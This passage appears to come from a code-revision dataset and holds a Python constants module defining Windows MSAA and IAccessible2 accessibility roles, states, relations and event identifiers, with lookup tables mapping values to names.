267\nIA2_EVENT_HYPERTEXT_LINK_SELECTED = 268\nIA2_EVENT_HYPERLINK_START_INDEX_CHANGED = 269\nIA2_EVENT_HYPERTEXT_CHANGED = 270\nIA2_EVENT_HYPERTEXT_NLINKS_CHANGED = 287\nIA2_EVENT_OBJECT_ATTRIBUTE_CHANGED = 288\nIA2_EVENT_PAGE_CHANGED = 273\nIA2_EVENT_SECTION_CHANGED = 274\nIA2_EVENT_TABLE_CAPTION_CHANGED = 275\nIA2_EVENT_TABLE_COLUMN_DESCRIPTION_CHANGED = 276\nIA2_EVENT_TABLE_COLUMN_HEADER_CHANGED = 277\nIA2_EVENT_TABLE_MODEL_CHANGED = 278\nIA2_EVENT_TABLE_ROW_DESCRIPTION_CHANGED = 279\nIA2_EVENT_TABLE_ROW_HEADER_CHANGED = 280\nIA2_EVENT_TABLE_SUMMARY_CHANGED = 281\nIA2_EVENT_TEXT_ATTRIBUTE_CHANGED = 282\nIA2_EVENT_TEXT_CARET_MOVED = 283\nIA2_EVENT_TEXT_CHANGED = 284\nIA2_EVENT_TEXT_COLUMN_CHANGED = 285\nIA2_EVENT_TEXT_INSERTED = 286\nIA2_EVENT_TEXT_REMOVED = 287\nIA2_EVENT_TEXT_UPDATED = 288\nIA2_EVENT_TEXT_SELECTION_CHANGED = 289\nIA2_EVENT_VISIBLE_DATA_CHANGED = 290\nUNLOCALIZED_EVENT_NAMES = {(1): u'EVENT_SYSTEM_SOUND', (2):\n u'EVENT_SYSTEM_ALERT', (3): u'EVENT_SYSTEM_FOREGROUND', (4):\n u'EVENT_SYSTEM_MENUSTART', (5): u'EVENT_SYSTEM_MENUEND', (6):\n u'EVENT_SYSTEM_MENUPOPUPSTART', (7): u'EVENT_SYSTEM_MENUPOPUPEND', (8):\n u'EVENT_SYSTEM_CAPTURESTART', (9): u'EVENT_SYSTEM_CAPTUREEND', (10):\n u'EVENT_SYSTEM_MOVESIZESTART', (11): u'EVENT_SYSTEM_MOVESIZEEND', (12):\n u'EVENT_SYSTEM_CONTEXTHELPSTART', (13): u'EVENT_SYSTEM_CONTEXTHELPEND',\n (14): u'EVENT_SYSTEM_DRAGDROPSTART', (15): u'EVENT_SYSTEM_DRAGDROPEND',\n (16): u'EVENT_SYSTEM_DIALOGSTART', (17): u'EVENT_SYSTEM_DIALOGEND', (18\n ): u'EVENT_SYSTEM_SCROLLINGSTART', (19): u'EVENT_SYSTEM_SCROLLINGEND',\n (20): u'EVENT_SYSTEM_SWITCHSTART', (21): u'EVENT_SYSTEM_SWITCHEND', (22\n ): u'EVENT_SYSTEM_MINIMIZESTART', (23): u'EVENT_SYSTEM_MINIMIZEEND', (\n 257): u'IA2_EVENT_ACTION_CHANGED', (258):\n u'IA2_EVENT_ACTIVE_DESCENDANT_CHANGED', (259):\n u'IA2_EVENT_DOCUMENT_ATTRIBUTE_CHANGED', (260):\n u'IA2_EVENT_DOCUMENT_CONTENT_CHANGED', (261):\n u'IA2_EVENT_DOCUMENT_LOAD_COMPLETE', (262):\n u'IA2_EVENT_DOCUMENT_LOAD_STOPPED', (263): u'IA2_EVENT_DOCUMENT_RELOAD',\n (264): u'IA2_EVENT_HYPERLINK_END_INDEX_CHANGED', (265):\n u'IA2_EVENT_HYPERLINK_NUMBER_OF_ANCHORS_CHANGED', (266):\n u'IA2_EVENT_HYPERLINK_SELECTED_LINK_CHANGED', (267):\n u'IA2_EVENT_HYPERTEXT_LINK_ACTIVATED', (268):\n u'IA2_EVENT_HYPERTEXT_LINK_SELECTED', (269):\n u'IA2_EVENT_HYPERLINK_START_INDEX_CHANGED', (270):\n u'IA2_EVENT_HYPERTEXT_CHANGED', (271):\n u'IA2_EVENT_HYPERTEXT_NLINKS_CHANGED', (272):\n u'IA2_EVENT_OBJECT_ATTRIBUTE_CHANGED', (273): u'IA2_EVENT_PAGE_CHANGED',\n (274): u'IA2_EVENT_SECTION_CHANGED', (275):\n u'IA2_EVENT_TABLE_CAPTION_CHANGED', (276):\n u'IA2_EVENT_TABLE_COLUMN_DESCRIPTION_CHANGED', (277):\n u'IA2_EVENT_TABLE_COLUMN_HEADER_CHANGED', (278):\n u'IA2_EVENT_TABLE_MODEL_CHANGED', (279):\n u'IA2_EVENT_TABLE_ROW_DESCRIPTION_CHANGED', (280):\n u'IA2_EVENT_TABLE_ROW_HEADER_CHANGED', (281):\n u'IA2_EVENT_TABLE_SUMMARY_CHANGED', (282):\n u'IA2_EVENT_TEXT_ATTRIBUTE_CHANGED', (283):\n u'IA2_EVENT_TEXT_CARET_MOVED', (284): u'IA2_EVENT_TEXT_CHANGED', (285):\n u'IA2_EVENT_TEXT_COLUMN_CHANGED', (286): u'IA2_EVENT_TEXT_INSERTED', (\n 287): u'IA2_EVENT_TEXT_REMOVED', (288): u'IA2_EVENT_TEXT_UPDATED', (289\n ): u'IA2_EVENT_TEXT_SELECTION_CHANGED', (290):\n u'IA2_EVENT_VISIBLE_DATA_CHANGED', (16385): u'EVENT_CONSOLE_CARET', (\n 16386): u'EVENT_CONSOLE_UPDATE_REGION', (16387):\n u'EVENT_CONSOLE_UPDATE_SIMPLE', (16388): u'EVENT_CONSOLE_UPDATE_SCROLL',\n (16389): u'EVENT_CONSOLE_LAYOUT', (16390):\n u'EVENT_CONSOLE_START_APPLICATION', (16391):\n u'EVENT_CONSOLE_END_APPLICATION', (32768): u'EVENT_OBJECT_CREATE', (\n 32769): u'EVENT_OBJECT_DESTROY', (32770): u'EVENT_OBJECT_SHOW', (32771):\n u'EVENT_OBJECT_HIDE', (32772): u'EVENT_OBJECT_REORDER', (32773):\n u'EVENT_OBJECT_FOCUS', (32774): u'EVENT_OBJECT_SELECTION', (32775):\n u'EVENT_OBJECT_SELECTIONADD', (32776): u'EVENT_OBJECT_SELECTIONREMOVE',\n (32777): u'EVENT_OBJECT_SELECTIONWITHIN', (32778):\n u'EVENT_OBJECT_STATECHANGE', (32779): u'EVENT_OBJECT_LOCATIONCHANGE', (\n 32780): u'EVENT_OBJECT_NAMECHANGE', (32781):\n u'EVENT_OBJECT_DESCRIPTIONCHANGE', (32782): u'EVENT_OBJECT_VALUECHANGE',\n (32783): u'EVENT_OBJECT_PARENTCHANGE', (32784):\n u'EVENT_OBJECT_HELPCHANGE', (32785): u'EVENT_OBJECT_DEFACTIONCHANGE', (\n 32786): u'EVENT_OBJECT_ACCELERATORCHANGE'}\nwinEventIDsToEventNames = {}\nfor _sym, _val in locals().items():\n if _sym.startswith('EVENT_') or _sym.startswith('IA2_EVENT_'):\n winEventIDsToEventNames[_val] = _sym\n",
"step-4": "'''\nUseful constants.\n\nInspired by pyatspi:\nhttp://live.gnome.org/GAP/PythonATSPI\n\n@author: Eitan Isaacson\n@copyright: Copyright (c) 2008, Eitan Isaacson\n@license: LGPL\n\nThis library is free software; you can redistribute it and/or\nmodify it under the terms of the GNU Library General Public\nLicense as published by the Free Software Foundation; either\nversion 2 of the License, or (at your option) any later version.\n\nThis library is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\nLibrary General Public License for more details.\n\nYou should have received a copy of the GNU Library General Public\nLicense along with this library; if not, write to the\nFree Software Foundation, Inc., 59 Temple Place - Suite 330,\nBoston, MA 02111-1307, USA.\n'''\n# Child ID.\nCHILDID_SELF = 0\n\n# IAccessibleText Constants\nIA2_TEXT_OFFSET_LENGTH = -1\nIA2_TEXT_OFFSET_CARET = -2\n\n# Accessible Roles\n# TODO: Is there a way to retrieve this at runtime or build time?\n#\nROLE_SYSTEM_ALERT = 8\nROLE_SYSTEM_ANIMATION = 54\nROLE_SYSTEM_APPLICATION = 14\nROLE_SYSTEM_BORDER = 19\nROLE_SYSTEM_BUTTONDROPDOWN = 56\nROLE_SYSTEM_BUTTONDROPDOWNGRID = 58\nROLE_SYSTEM_BUTTONMENU = 57\nROLE_SYSTEM_CARET = 7\nROLE_SYSTEM_CELL = 29\nROLE_SYSTEM_CHARACTER = 32\nROLE_SYSTEM_CHART = 17\nROLE_SYSTEM_CHECKBUTTON = 44\nROLE_SYSTEM_CLIENT = 10\nROLE_SYSTEM_CLOCK = 61\nROLE_SYSTEM_COLUMN = 27\nROLE_SYSTEM_COLUMNHEADER = 25\nROLE_SYSTEM_COMBOBOX = 46\nROLE_SYSTEM_CURSOR = 6\nROLE_SYSTEM_DIAGRAM = 53\nROLE_SYSTEM_DIAL = 49\nROLE_SYSTEM_DIALOG = 18\nROLE_SYSTEM_DOCUMENT = 15\nROLE_SYSTEM_DROPLIST = 47\nROLE_SYSTEM_EQUATION = 55\nROLE_SYSTEM_GRAPHIC = 40\nROLE_SYSTEM_GRIP = 4\nROLE_SYSTEM_GROUPING = 20\nROLE_SYSTEM_HELPBALLOON = 31\nROLE_SYSTEM_HOTKEYFIELD = 50\nROLE_SYSTEM_INDICATOR = 39\nROLE_SYSTEM_LINK = 30\nROLE_SYSTEM_LIST = 33\nROLE_SYSTEM_LISTITEM = 34\nROLE_SYSTEM_MENUBAR = 2\nROLE_SYSTEM_MENUITEM = 12\nROLE_SYSTEM_MENUPOPUP = 11\nROLE_SYSTEM_OUTLINE = 35\nROLE_SYSTEM_OUTLINEITEM = 36\nROLE_SYSTEM_PAGETAB = 37\nROLE_SYSTEM_PAGETABLIST = 60\nROLE_SYSTEM_PANE = 16\nROLE_SYSTEM_PROGRESSBAR = 48\nROLE_SYSTEM_PROPERTYPAGE = 38\nROLE_SYSTEM_PUSHBUTTON = 43\nROLE_SYSTEM_RADIOBUTTON = 45\nROLE_SYSTEM_ROW = 28\nROLE_SYSTEM_ROWHEADER = 26\nROLE_SYSTEM_SCROLLBAR = 3\nROLE_SYSTEM_SEPARATOR = 21\nROLE_SYSTEM_SLIDER = 51\nROLE_SYSTEM_SOUND = 5\nROLE_SYSTEM_SPINBUTTON = 52\nROLE_SYSTEM_STATICTEXT = 41\nROLE_SYSTEM_STATUSBAR = 23\nROLE_SYSTEM_TABLE = 24\nROLE_SYSTEM_TEXT = 42\nROLE_SYSTEM_TITLEBAR = 1\nROLE_SYSTEM_TOOLBAR = 22\nROLE_SYSTEM_TOOLTIP = 13\nROLE_SYSTEM_WHITESPACE = 59\nROLE_SYSTEM_WINDOW = 9\n\nIA2_ROLE_UNKNOWN = 0\nIA2_ROLE_CANVAS = 0x401\nIA2_ROLE_CAPTION = 0x402\nIA2_ROLE_CHECK_MENU_ITEM = 0x403\nIA2_ROLE_COLOR_CHOOSER = 0x404\nIA2_ROLE_DATE_EDITOR = 0x405\nIA2_ROLE_DESKTOP_ICON = 0x406\nIA2_ROLE_DESKTOP_PANE = 0x407\nIA2_ROLE_DIRECTORY_PANE = 0x408\nIA2_ROLE_EDITBAR = 0x409\nIA2_ROLE_EMBEDDED_OBJECT = 0x40a\nIA2_ROLE_ENDNOTE = 0x40b\nIA2_ROLE_FILE_CHOOSER = 0x40c\nIA2_ROLE_FONT_CHOOSER = 0x40d\nIA2_ROLE_FOOTER = 0x40e\nIA2_ROLE_FOOTNOTE = 0x40f\nIA2_ROLE_FORM = 0x410\nIA2_ROLE_FRAME = 0x411\nIA2_ROLE_GLASS_PANE = 0x412\nIA2_ROLE_HEADER = 0x413\nIA2_ROLE_HEADING = 0x414\nIA2_ROLE_ICON = 0x415\nIA2_ROLE_IMAGE_MAP = 0x416\nIA2_ROLE_INPUT_METHOD_WINDOW = 0x417\nIA2_ROLE_INTERNAL_FRAME = 0x418\nIA2_ROLE_LABEL = 0x419\nIA2_ROLE_LAYERED_PANE = 0x41a\nIA2_ROLE_NOTE = 0x41b\nIA2_ROLE_OPTION_PANE = 0x41c\nIA2_ROLE_PAGE = 0x41d\nIA2_ROLE_PARAGRAPH = 0x41e\nIA2_ROLE_RADIO_MENU_ITEM = 0x41f\nIA2_ROLE_REDUNDANT_OBJECT = 0x420\nIA2_ROLE_ROOT_PANE = 0x421\nIA2_ROLE_RULER = 0x422\nIA2_ROLE_SCROLL_PANE = 0x423\nIA2_ROLE_SECTION = 0x424\nIA2_ROLE_SHAPE = 0x425\nIA2_ROLE_SPLIT_PANE = 0x426\nIA2_ROLE_TEAR_OFF_MENU = 0x427\nIA2_ROLE_TERMINAL = 0x428\nIA2_ROLE_TEXT_FRAME = 0x429\nIA2_ROLE_TOGGLE_BUTTON = 0x42a\nIA2_ROLE_VIEW_PORT = 0x42b\nIA2_ROLE_COMPLEMENTARY_CONTENT = 0x42c\nIA2_ROLE_LANDMARK = 0x42d\n\n\n\n# Unlocalized role strings\nUNLOCALIZED_ROLE_NAMES = {\n 1: u'ROLE_SYSTEM_TITLEBAR',\n 2: u'ROLE_SYSTEM_MENUBAR',\n 3: u'ROLE_SYSTEM_SCROLLBAR',\n 4: u'ROLE_SYSTEM_GRIP',\n 5: u'ROLE_SYSTEM_SOUND',\n 6: u'ROLE_SYSTEM_CURSOR',\n 7: u'ROLE_SYSTEM_CARET',\n 8: u'ROLE_SYSTEM_ALERT',\n 9: u'ROLE_SYSTEM_WINDOW',\n 10: u'ROLE_SYSTEM_CLIENT',\n 11: u'ROLE_SYSTEM_MENUPOPUP',\n 12: u'ROLE_SYSTEM_MENUITEM',\n 13: u'ROLE_SYSTEM_TOOLTIP',\n 14: u'ROLE_SYSTEM_APPLICATION',\n 15: u'ROLE_SYSTEM_DOCUMENT',\n 16: u'ROLE_SYSTEM_PANE',\n 17: u'ROLE_SYSTEM_CHART',\n 18: u'ROLE_SYSTEM_DIALOG',\n 19: u'ROLE_SYSTEM_BORDER',\n 20: u'ROLE_SYSTEM_GROUPING',\n 21: u'ROLE_SYSTEM_SEPARATOR',\n 22: u'ROLE_SYSTEM_TOOLBAR',\n 23: u'ROLE_SYSTEM_STATUSBAR',\n 24: u'ROLE_SYSTEM_TABLE',\n 25: u'ROLE_SYSTEM_COLUMNHEADER',\n 26: u'ROLE_SYSTEM_ROWHEADER',\n 27: u'ROLE_SYSTEM_COLUMN',\n 28: u'ROLE_SYSTEM_ROW',\n 29: u'ROLE_SYSTEM_CELL',\n 30: u'ROLE_SYSTEM_LINK',\n 31: u'ROLE_SYSTEM_HELPBALLOON',\n 32: u'ROLE_SYSTEM_CHARACTER',\n 33: u'ROLE_SYSTEM_LIST',\n 34: u'ROLE_SYSTEM_LISTITEM',\n 35: u'ROLE_SYSTEM_OUTLINE',\n 36: u'ROLE_SYSTEM_OUTLINEITEM',\n 37: u'ROLE_SYSTEM_PAGETAB',\n 38: u'ROLE_SYSTEM_PROPERTYPAGE',\n 39: u'ROLE_SYSTEM_INDICATOR',\n 40: u'ROLE_SYSTEM_GRAPHIC',\n 41: u'ROLE_SYSTEM_STATICTEXT',\n 42: u'ROLE_SYSTEM_TEXT',\n 43: u'ROLE_SYSTEM_PUSHBUTTON',\n 44: u'ROLE_SYSTEM_CHECKBUTTON',\n 45: u'ROLE_SYSTEM_RADIOBUTTON',\n 46: u'ROLE_SYSTEM_COMBOBOX',\n 47: u'ROLE_SYSTEM_DROPLIST',\n 48: u'ROLE_SYSTEM_PROGRESSBAR',\n 49: u'ROLE_SYSTEM_DIAL',\n 50: u'ROLE_SYSTEM_HOTKEYFIELD',\n 51: u'ROLE_SYSTEM_SLIDER',\n 52: u'ROLE_SYSTEM_SPINBUTTON',\n 53: u'ROLE_SYSTEM_DIAGRAM',\n 54: u'ROLE_SYSTEM_ANIMATION',\n 55: u'ROLE_SYSTEM_EQUATION',\n 56: u'ROLE_SYSTEM_BUTTONDROPDOWN',\n 57: u'ROLE_SYSTEM_BUTTONMENU',\n 58: u'ROLE_SYSTEM_BUTTONDROPDOWNGRID',\n 59: u'ROLE_SYSTEM_WHITESPACE',\n 60: u'ROLE_SYSTEM_PAGETABLIST',\n 61: u'ROLE_SYSTEM_CLOCK'}\n\n# Unlocalized role strings\nUNLOCALIZED_IA2_ROLE_NAMES = {\n 0x000: u'IA2_ROLE_UNKNOWN',\n 0x401: u'IA2_ROLE_CANVAS',\n 0x402: u'IA2_ROLE_CAPTION',\n 0x403: u'IA2_ROLE_CHECK_MENU_ITEM',\n 0x404: u'IA2_ROLE_COLOR_CHOOSER',\n 0x405: u'IA2_ROLE_DATE_EDITOR',\n 0x406: u'IA2_ROLE_DESKTOP_ICON',\n 0x407: u'IA2_ROLE_DESKTOP_PANE',\n 0x408: u'IA2_ROLE_DIRECTORY_PANE',\n 0x409: u'IA2_ROLE_EDITBAR',\n 0x40a: u'IA2_ROLE_EMBEDDED_OBJECT',\n 0x40b: u'IA2_ROLE_ENDNOTE',\n 0x40c: u'IA2_ROLE_FILE_CHOOSER',\n 0x40d: u'IA2_ROLE_FONT_CHOOSER',\n 0x40e: u'IA2_ROLE_FOOTER',\n 0x40f: u'IA2_ROLE_FOOTNOTE',\n 0x410: u'IA2_ROLE_FORM',\n 0x411: u'IA2_ROLE_FRAME',\n 0x412: u'IA2_ROLE_GLASS_PANE',\n 0x413: u'IA2_ROLE_HEADER',\n 0x414: u'IA2_ROLE_HEADING',\n 0x415: u'IA2_ROLE_ICON',\n 0x416: u'IA2_ROLE_IMAGE_MAP',\n 0x417: u'IA2_ROLE_INPUT_METHOD_WINDOW',\n 0x418: u'IA2_ROLE_INTERNAL_FRAME',\n 0x419: u'IA2_ROLE_LABEL',\n 0x41a: u'IA2_ROLE_LAYERED_PANE',\n 0x41b: u'IA2_ROLE_NOTE',\n 0x41c: u'IA2_ROLE_OPTION_PANE',\n 0x41d: u'IA2_ROLE_PAGE',\n 0x41e: u'IA2_ROLE_PARAGRAPH',\n 0x41f: u'IA2_ROLE_RADIO_MENU_ITEM',\n 0x420: u'IA2_ROLE_REDUNDANT_OBJECT',\n 0x421: u'IA2_ROLE_ROOT_PANE',\n 0x422: u'IA2_ROLE_RULER',\n 0x423: u'IA2_ROLE_SCROLL_PANE',\n 0x424: u'IA2_ROLE_SECTION',\n 0x425: u'IA2_ROLE_SHAPE',\n 0x426: u'IA2_ROLE_SPLIT_PANE',\n 0x427: u'IA2_ROLE_TEAR_OFF_MENU',\n 0x428: u'IA2_ROLE_TERMINAL',\n 0x429: u'IA2_ROLE_TEXT_FRAME',\n 0x42a: u'IA2_ROLE_TOGGLE_BUTTON',\n 0x42b: u'IA2_ROLE_VIEW_PORT',\n 0x42c: u'IA2_ROLE_COMPLEMENTARY_CONTENT',\n 0x42d: u'IA2_ROLE_LANDMARK'}\n\n# Navigation constants\nNAVDIR_DOWN = 2\nNAVDIR_FIRSTCHILD = 7\nNAVDIR_LASTCHILD = 8\nNAVDIR_LEFT = 3\nNAVDIR_NEXT = 5\nNAVDIR_PREVIOUS = 6\nNAVDIR_RIGHT = 4\nNAVDIR_UP = 1\n\nSTATE_SYSTEM_UNAVAILABLE = 0x1\nSTATE_SYSTEM_SELECTED = 0x2\nSTATE_SYSTEM_FOCUSED = 0x4\nSTATE_SYSTEM_PRESSED = 0x8\nSTATE_SYSTEM_CHECKED = 0x10\nSTATE_SYSTEM_MIXED = 0x20\nSTATE_SYSTEM_READONLY = 0x40\nSTATE_SYSTEM_HOTTRACKED = 0x80\nSTATE_SYSTEM_DEFAULT = 0x100\nSTATE_SYSTEM_EXPANDED = 0x200\nSTATE_SYSTEM_COLLAPSED = 0x400\nSTATE_SYSTEM_BUSY = 0x800\nSTATE_SYSTEM_FLOATING = 0x1000\nSTATE_SYSTEM_MARQUEED = 0x2000\nSTATE_SYSTEM_ANIMATED = 0x4000\nSTATE_SYSTEM_INVISIBLE = 0x8000\nSTATE_SYSTEM_OFFSCREEN = 0x10000\nSTATE_SYSTEM_SIZEABLE = 0x20000\nSTATE_SYSTEM_MOVEABLE = 0x40000\nSTATE_SYSTEM_SELFVOICING = 0x80000\nSTATE_SYSTEM_FOCUSABLE = 0x100000\nSTATE_SYSTEM_SELECTABLE = 0x200000\nSTATE_SYSTEM_LINKED = 0x400000\nSTATE_SYSTEM_TRAVERSED = 0x800000\nSTATE_SYSTEM_MULTISELECTABLE = 0x1000000\nSTATE_SYSTEM_EXTSELECTABLE = 0x2000000\nSTATE_SYSTEM_HASSUBMENU = 0x4000000\nSTATE_SYSTEM_ALERT_LOW = 0x4000000\nSTATE_SYSTEM_ALERT_MEDIUM = 0x8000000\nSTATE_SYSTEM_ALERT_HIGH = 0x10000000\nSTATE_SYSTEM_PROTECTED = 0x20000000\nSTATE_SYSTEM_HASPOPUP = 0x40000000\nSTATE_SYSTEM_VALID = 0x1fffffff\n\n\n# Unlocalized state strings\nUNLOCALIZED_STATE_NAMES = {\n 1: u'STATE_SYSTEM_UNAVAILABLE',\n 2: u'STATE_SYSTEM_SELECTED',\n 4: u'STATE_SYSTEM_FOCUSED',\n 8: u'STATE_SYSTEM_PRESSED',\n 16: u'STATE_SYSTEM_CHECKED',\n 32: u'STATE_SYSTEM_MIXED',\n 64: u'STATE_SYSTEM_READONLY',\n 128: u'STATE_SYSTEM_HOTTRACKED',\n 256: u'STATE_SYSTEM_DEFAULT',\n 512: u'STATE_SYSTEM_EXPANDED',\n 1024: u'STATE_SYSTEM_COLLAPSED',\n 2048: u'STATE_SYSTEM_BUSY',\n 4096: u'STATE_SYSTEM_FLOATING',\n 8192: u'STATE_SYSTEM_MARQUEED',\n 16384: u'STATE_SYSTEM_ANIMATED',\n 32768: u'STATE_SYSTEM_INVISIBLE',\n 65536: u'STATE_SYSTEM_OFFSCREEN',\n 131072: u'STATE_SYSTEM_SIZEABLE',\n 262144: u'STATE_SYSTEM_MOVEABLE',\n 524288: u'STATE_SYSTEM_SELFVOICING',\n 1048576: u'STATE_SYSTEM_FOCUSABLE',\n 2097152: u'STATE_SYSTEM_SELECTABLE',\n 4194304: u'STATE_SYSTEM_LINKED',\n 8388608: u'STATE_SYSTEM_TRAVERSED',\n 16777216: u'STATE_SYSTEM_MULTISELECTABLE',\n 33554432: u'STATE_SYSTEM_EXTSELECTABLE',\n 67108864: u'STATE_SYSTEM_ALERT_LOW',\n 134217728: u'STATE_SYSTEM_ALERT_MEDIUM',\n 268435456: u'STATE_SYSTEM_ALERT_HIGH',\n 536870912: u'STATE_SYSTEM_PROTECTED',\n 1073741824: u'STATE_SYSTEM_HASPOPUP',\n 0x1fffffff: u'STATE_SYSTEM_VALID'}\n\nIA2_STATE_ACTIVE = 0x1\nIA2_STATE_ARMED = 0x2\nIA2_STATE_DEFUNCT = 0x4\nIA2_STATE_EDITABLE = 0x8\nIA2_STATE_HORIZONTAL = 0x10\nIA2_STATE_ICONIFIED = 0x20\nIA2_STATE_INVALID_ENTRY = 0x40\nIA2_STATE_MANAGES_DESCENDANTS = 0x80\nIA2_STATE_MODAL = 0x100\nIA2_STATE_MULTI_LINE = 0x200\nIA2_STATE_OPAQUE = 0x400\nIA2_STATE_REQUIRED = 0x800\nIA2_STATE_SELECTABLE_TEXT = 0x1000\nIA2_STATE_SINGLE_LINE = 0x2000\nIA2_STATE_STALE = 0x4000\nIA2_STATE_SUPPORTS_AUTOCOMPLETION = 0x8000\nIA2_STATE_TRANSIENT = 0x10000\nIA2_STATE_VERTICAL = 0x20000\nIA2_STATE_CHECKABLE = 0x40000\nIA2_STATE_PINNED = 0x80000\n\nUNLOCALIZED_IA2_STATE_NAMES = {\n 1: u'IA2_STATE_ACTIVE',\n 2: u'IA2_STATE_ARMED',\n 4: u'IA2_STATE_DEFUNCT',\n 8: u'IA2_STATE_EDITABLE',\n 16: u'IA2_STATE_HORIZONTAL',\n 32: u'IA2_STATE_ICONIFIED',\n 64: u'IA2_STATE_INVALID_ENTRY',\n 128: u'IA2_STATE_MANAGES_DESCENDANTS',\n 256: u'IA2_STATE_MODAL',\n 512: u'IA2_STATE_MULTI_LINE',\n 1024: u'IA2_STATE_OPAQUE',\n 2048: u'IA2_STATE_REQUIRED',\n 4096: u'IA2_STATE_SELECTABLE_TEXT',\n 8192: u'IA2_STATE_SINGLE_LINE',\n 16384: u'IA2_STATE_STALE',\n 32768: u'IA2_STATE_SUPPORTS_AUTOCOMPLETION',\n 65536: u'IA2_STATE_TRANSIENT',\n 131072: u'IA2_STATE_VERTICAL',\n 262144: u'IA2_STATE_CHECKABLE',\n 524288: u'IA2_STATE_PINNED'}\n\nUNLOCALIZED_IA2_RELATION_TYPES = {\n u'containingApplication' : u'IA2_RELATION_CONTAINING_APPLICATION',\n u'containingDocument' : u'IA2_RELATION_CONTAINING_DOCUMENT',\n u'containingTabPane' : u'IA2_RELATION_CONTAINING_TAB_PANE',\n u'containingWindow' : u'IA2_RELATION_CONTAINING_WINDOW',\n u'controlledBy' : u'IA2_RELATION_CONTROLLED_BY',\n u'controllerFor' : u'IA2_RELATION_CONTROLLER_FOR',\n u'describedBy' : u'IA2_RELATION_DESCRIBED_BY',\n u'descriptionFor' : u'IA2_RELATION_DESCRIPTION_FOR',\n u'details' : u'IA2_RELATION_DETAILS',\n u'detailsFor' : u'IA2_RELATION_DETAILS_FOR',\n u'embeddedBy' : u'IA2_RELATION_EMBEDDED_BY',\n u'embeds' : u'IA2_RELATION_EMBEDS',\n u'errorMessage' : u'IA2_RELATION_ERROR_MESSAGE',\n u'errorFor' : u'IA2_RELATION_ERROR_FOR',\n u'flowsFrom' : u'IA2_RELATION_FLOWS_FROM',\n u'flowsTo' : u'IA2_RELATION_FLOWS_TO',\n u'labelFor' : u'IA2_RELATION_LABEL_FOR',\n u'labelledBy' : u'IA2_RELATION_LABELED_BY',\n u'labelledBy' : u'IA2_RELATION_LABELLED_BY',\n u'memberOf' : u'IA2_RELATION_MEMBER_OF',\n u'nextTabbable' : u'IA2_RELATION_NEXT_TABBABLE',\n u'nodeChildOf' : u'IA2_RELATION_NODE_CHILD_OF',\n u'nodeParentOf' : u'IA2_RELATION_NODE_PARENT_OF',\n u'parentWindowOf' : u'IA2_RELATION_PARENT_WINDOW_OF',\n u'popupFor' : u'IA2_RELATION_POPUP_FOR',\n u'previousTabbable' : u'IA2_RELATION_PREVIOUS_TABBABLE',\n u'subwindowOf' : u'IA2_RELATION_SUBWINDOW_OF'}\n\n\n# SetWinEventHook() flags\nWINEVENT_OUTOFCONTEXT = 0x0\nWINEVENT_SKIPOWNTHREAD =0x1\nWINEVENT_SKIPOWNPROCESS = 0x2\nWINEVENT_INCONTEXT = 0x4\n\n#win events\nEVENT_SYSTEM_SOUND = 0x1\nEVENT_SYSTEM_ALERT = 0x2\nEVENT_SYSTEM_FOREGROUND = 0x3\nEVENT_SYSTEM_MENUSTART = 0x4\nEVENT_SYSTEM_MENUEND = 0x5\nEVENT_SYSTEM_MENUPOPUPSTART = 0x6\nEVENT_SYSTEM_MENUPOPUPEND = 0x7\nEVENT_SYSTEM_CAPTURESTART = 0x8\nEVENT_SYSTEM_CAPTUREEND = 0x9\nEVENT_SYSTEM_MOVESIZESTART = 0xa\nEVENT_SYSTEM_MOVESIZEEND = 0xb\nEVENT_SYSTEM_CONTEXTHELPSTART = 0xc\nEVENT_SYSTEM_CONTEXTHELPEND = 0xd\nEVENT_SYSTEM_DRAGDROPSTART = 0xe\nEVENT_SYSTEM_DRAGDROPEND = 0xf\nEVENT_SYSTEM_DIALOGSTART = 0x10\nEVENT_SYSTEM_DIALOGEND = 0x11\nEVENT_SYSTEM_SCROLLINGSTART = 0x12\nEVENT_SYSTEM_SCROLLINGEND = 0x13\nEVENT_SYSTEM_SWITCHSTART = 0x14\nEVENT_SYSTEM_SWITCHEND = 0x15\nEVENT_SYSTEM_MINIMIZESTART = 0x16\nEVENT_SYSTEM_MINIMIZEEND = 0x17\nEVENT_OBJECT_CREATE = 0x8000\nEVENT_OBJECT_DESTROY = 0x8001\nEVENT_OBJECT_SHOW = 0x8002\nEVENT_OBJECT_HIDE = 0x8003\nEVENT_OBJECT_REORDER = 0x8004\nEVENT_OBJECT_FOCUS = 0x8005\nEVENT_OBJECT_SELECTION = 0x8006\nEVENT_OBJECT_SELECTIONADD = 0x8007\nEVENT_OBJECT_SELECTIONREMOVE = 0x8008\nEVENT_OBJECT_SELECTIONWITHIN = 0x8009\nEVENT_OBJECT_STATECHANGE = 0x800a\nEVENT_OBJECT_LOCATIONCHANGE = 0x800b\nEVENT_OBJECT_NAMECHANGE = 0x800c\nEVENT_OBJECT_DESCRIPTIONCHANGE = 0x800d\nEVENT_OBJECT_VALUECHANGE = 0x800e\nEVENT_OBJECT_PARENTCHANGE = 0x800f\nEVENT_OBJECT_HELPCHANGE = 0x8010\nEVENT_OBJECT_DEFACTIONCHANGE = 0x8011\nEVENT_OBJECT_ACCELERATORCHANGE = 0x8012\nEVENT_CONSOLE_CARET = 0x4001\nEVENT_CONSOLE_UPDATE_REGION = 0x4002\nEVENT_CONSOLE_UPDATE_SIMPLE = 0x4003\nEVENT_CONSOLE_UPDATE_SCROLL = 0x4004\nEVENT_CONSOLE_LAYOUT = 0x4005\nEVENT_CONSOLE_START_APPLICATION = 0x4006\nEVENT_CONSOLE_END_APPLICATION = 0x4007\n\n# IAccessible2 events\nIA2_EVENT_ACTION_CHANGED = 0x101\nIA2_EVENT_ACTIVE_DECENDENT_CHANGED = 0x102\nIA2_EVENT_ACTIVE_DESCENDANT_CHANGED = 0x102\nIA2_EVENT_DOCUMENT_ATTRIBUTE_CHANGED = 0x103\nIA2_EVENT_DOCUMENT_CONTENT_CHANGED = 0x104\nIA2_EVENT_DOCUMENT_LOAD_COMPLETE = 0x105\nIA2_EVENT_DOCUMENT_LOAD_STOPPED = 0x106\nIA2_EVENT_DOCUMENT_RELOAD = 0x107\nIA2_EVENT_HYPERLINK_END_INDEX_CHANGED = 0x108\nIA2_EVENT_HYPERLINK_NUMBER_OF_ANCHORS_CHANGED = 0x109\nIA2_EVENT_HYPERLINK_SELECTED_LINK_CHANGED = 0x10a\nIA2_EVENT_HYPERTEXT_LINK_ACTIVATED = 